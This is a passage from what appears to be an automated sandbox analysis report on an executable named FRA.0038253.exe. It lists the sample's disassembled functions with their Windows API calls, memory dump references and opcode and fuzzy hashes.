                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1e72a8c2f3d05c6c1e0742ed39dda9758dd1b9f9ad80f841a113e9c28009993
                                                                          • Instruction ID: 485452d7c446576a821aa39b035f5fb1ba281567f1f6404756a0da2d8a4c3cb6
                                                                          • Opcode Fuzzy Hash: a1e72a8c2f3d05c6c1e0742ed39dda9758dd1b9f9ad80f841a113e9c28009993
                                                                          • Instruction Fuzzy Hash: BF714471D04229CBDF28CFA8C844BADBBB1FB44305F15806AD856BB281C778A986DF55
                                                                          Function 00406D30 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0867957d813e90f65207f296e55faaee27809d74634d9a704723f8ef7fa43b30
                                                                          • Instruction ID: 4ded8c1d1e2e3999b6954fd3fb668038a5be2c4f66e61b0ccb89f2d81000a323
                                                                          • Opcode Fuzzy Hash: 0867957d813e90f65207f296e55faaee27809d74634d9a704723f8ef7fa43b30
                                                                          • Instruction Fuzzy Hash: D7715571D04229CBDF28CF98C844BADBBB1FF44305F15816AD852BB281C7786986DF55
                                                                          Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6b371a7cbe9b6f476bd2b883a2a6f2b197d66d56ae2e6550a7d6a6a8abe04e45
                                                                          • Instruction ID: 6b0722097d85d0f98ba7dadc264a868d2289917d2162726ec4fb7beb4db67966
                                                                          • Opcode Fuzzy Hash: 6b371a7cbe9b6f476bd2b883a2a6f2b197d66d56ae2e6550a7d6a6a8abe04e45
                                                                          • Instruction Fuzzy Hash: F9716571D04229CBDF28CF98C844BADBBB1FF44305F15806AD852BB281C778AA86DF45
                                                                          Function 00401BAC Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401C1B
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C2D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID: Call
                                                                          • API String ID: 3394109436-1824292864
                                                                          • Opcode ID: 2d11fc407f55666b2297ede61233392b299267979b0b2947b3ab3e1258a1f801
                                                                          • Instruction ID: 7cc70c40f421edf6522644ccb956ba00ea718e3585232f5ec85d51c9bef40d0d
                                                                          • Opcode Fuzzy Hash: 2d11fc407f55666b2297ede61233392b299267979b0b2947b3ab3e1258a1f801
                                                                          • Instruction Fuzzy Hash: 072181B2600104ABDB20FBA48E84E5F73A9EB44318721453BF602B32D1DB7C98129B5D
                                                                          Function 00402318 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004065EA: FindFirstFileA.KERNELBASE(77673410,00422170,00421D28,00405D1A,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 004065F5
                                                                            • Part of subcall function 004065EA: FindClose.KERNEL32(00000000), ref: 00406601
                                                                          • lstrlenA.KERNEL32 ref: 00402358
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00402362
                                                                          • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                                          • String ID:
                                                                          • API String ID: 1486964399-0
                                                                          • Opcode ID: d0507c26d99205b539877ee4ce701286c414c884b2c2ede43011d32adc77240d
                                                                          • Instruction ID: 48bcb544c10d5723e6e7e72f0137b6967035a084c5180a54af5929dba4702135
                                                                          • Opcode Fuzzy Hash: d0507c26d99205b539877ee4ce701286c414c884b2c2ede43011d32adc77240d
                                                                          • Instruction Fuzzy Hash: A5118271A08318AADB10EFF58A45A9EB7B8AF14318F10407FB501F72C2D6BCC5428B59
                                                                          Function 004025B5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 397863658-0
                                                                          • Opcode ID: 52b3948d167d8047ea5c127e5d5ffde1caa0db40759a1ca40712afb1b9010bfe
                                                                          • Instruction ID: 767dd8e48c36e81039e758b3444d1685b97279011b561529f75ad00eb187516e
                                                                          • Opcode Fuzzy Hash: 52b3948d167d8047ea5c127e5d5ffde1caa0db40759a1ca40712afb1b9010bfe
                                                                          • Instruction Fuzzy Hash: 29017C71605204AFEB258F54DE98ABF7AACEB40358F10443FF445A61C0DAB94A419A29
                                                                          Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402573
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 2d60b4cea33d5069751520cca0e100caa2f3baf6bda9f3db60fc1164f043b114
                                                                          • Instruction ID: fb13372a836cad299cf6fa53b2c9afd843d26f5936c0cf155bb460460c7365c6
                                                                          • Opcode Fuzzy Hash: 2d60b4cea33d5069751520cca0e100caa2f3baf6bda9f3db60fc1164f043b114
                                                                          • Instruction Fuzzy Hash: 1511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE442B72C0D6B88A45DA1A
                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: c84be941dc6a1d7a96362bea620c540ea161ebf3f36d68bcfe60af822e705706
                                                                          • Instruction ID: 96616b7a1d8761cd4e25acfd582333427895197751797c173d65a169d5ce1978
                                                                          • Opcode Fuzzy Hash: c84be941dc6a1d7a96362bea620c540ea161ebf3f36d68bcfe60af822e705706
                                                                          • Instruction Fuzzy Hash: AE01D1317242109BE7295B389D05B2A3AA8E710355F10823AB855F65F1D678DC028B4C
                                                                          Function 0040244E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteValue
                                                                          • String ID:
                                                                          • API String ID: 2831762973-0
                                                                          • Opcode ID: 1262f06be417b70d3852bacc4699df3891d2cdeb927be9239e1529aef61e2b16
                                                                          • Instruction ID: 6ea25ce9535c40e5af99fea640ff93ad96082ef6aea03396a5ad10aa40119224
                                                                          • Opcode Fuzzy Hash: 1262f06be417b70d3852bacc4699df3891d2cdeb927be9239e1529aef61e2b16
                                                                          • Instruction Fuzzy Hash: 85F0BB32A04121AFEB60EBA49F4DABF72A99B40314F25003FF501B71C1D9F84E42866E
                                                                          Function 00405861 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?), ref: 004058A3
                                                                          • GetLastError.KERNEL32 ref: 004058B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                                                          • Instruction ID: 55f356f7bf60f745e5b70ed22492a519aa14ad1381e3bdd4eda5ccf522c0d7d6
                                                                          • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                                                          • Instruction Fuzzy Hash: 4CF0F971C0020DDBEB01DFA4D5087DEBBB4AF04305F00802AD841B6280D7B882588B99
                                                                          Function 004058F0 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422128,00426800,00426800,00426800,?,920,00000000), ref: 00405919
                                                                          • CloseHandle.KERNEL32(?), ref: 00405926
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3712363035-0
                                                                          • Opcode ID: 6eb3c843a62665a2e66f1b6d59be22b40aa3537446113bba5c55f7e285da1986
                                                                          • Instruction ID: 79e3e1688c9b6b49a4337afcc26cfa8d76d2273a1cd1f72193335d48ae978bdb
                                                                          • Opcode Fuzzy Hash: 6eb3c843a62665a2e66f1b6d59be22b40aa3537446113bba5c55f7e285da1986
                                                                          • Instruction Fuzzy Hash: 3BE0BFF4600219BFEB119B64ED05F7B77BCE704704F518525BD51F2151DA7498148A78
                                                                          Function 00401594 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(0001045C), ref: 004015A6
                                                                          • ShowWindow.USER32(00010456), ref: 004015BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: aa680a91534ccf3912ddd5e948250112a4a82363c2482d2fa5cdc82e1102b970
                                                                          • Instruction ID: 6d5952610be4c359194c07ab9686045a5f286bd6d5f36b374e71640b697ab970
                                                                          • Opcode Fuzzy Hash: aa680a91534ccf3912ddd5e948250112a4a82363c2482d2fa5cdc82e1102b970
                                                                          • Instruction Fuzzy Hash: BCE04F727001109FCF64DF94EEA086E73B6E794311360043FD502B3290C6799D028E68
                                                                          Function 0040667F Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,00000000,?,004034E4,0000000C), ref: 00406691
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066AC
                                                                            • Part of subcall function 00406611: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406628
                                                                            • Part of subcall function 00406611: wsprintfA.USER32 ref: 00406661
                                                                            • Part of subcall function 00406611: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406675
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                                          • Instruction ID: b822115cc93c87e4770b1e8a92c35aa845e39af966f392d1223ab81df9f7854c
                                                                          • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                                          • Instruction Fuzzy Hash: 92E08633504210AAD611A7709E0883762AC9E867043060C3EF543F6240DB399C729A6E
                                                                          Function 00405DEA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          Memory Dump Source
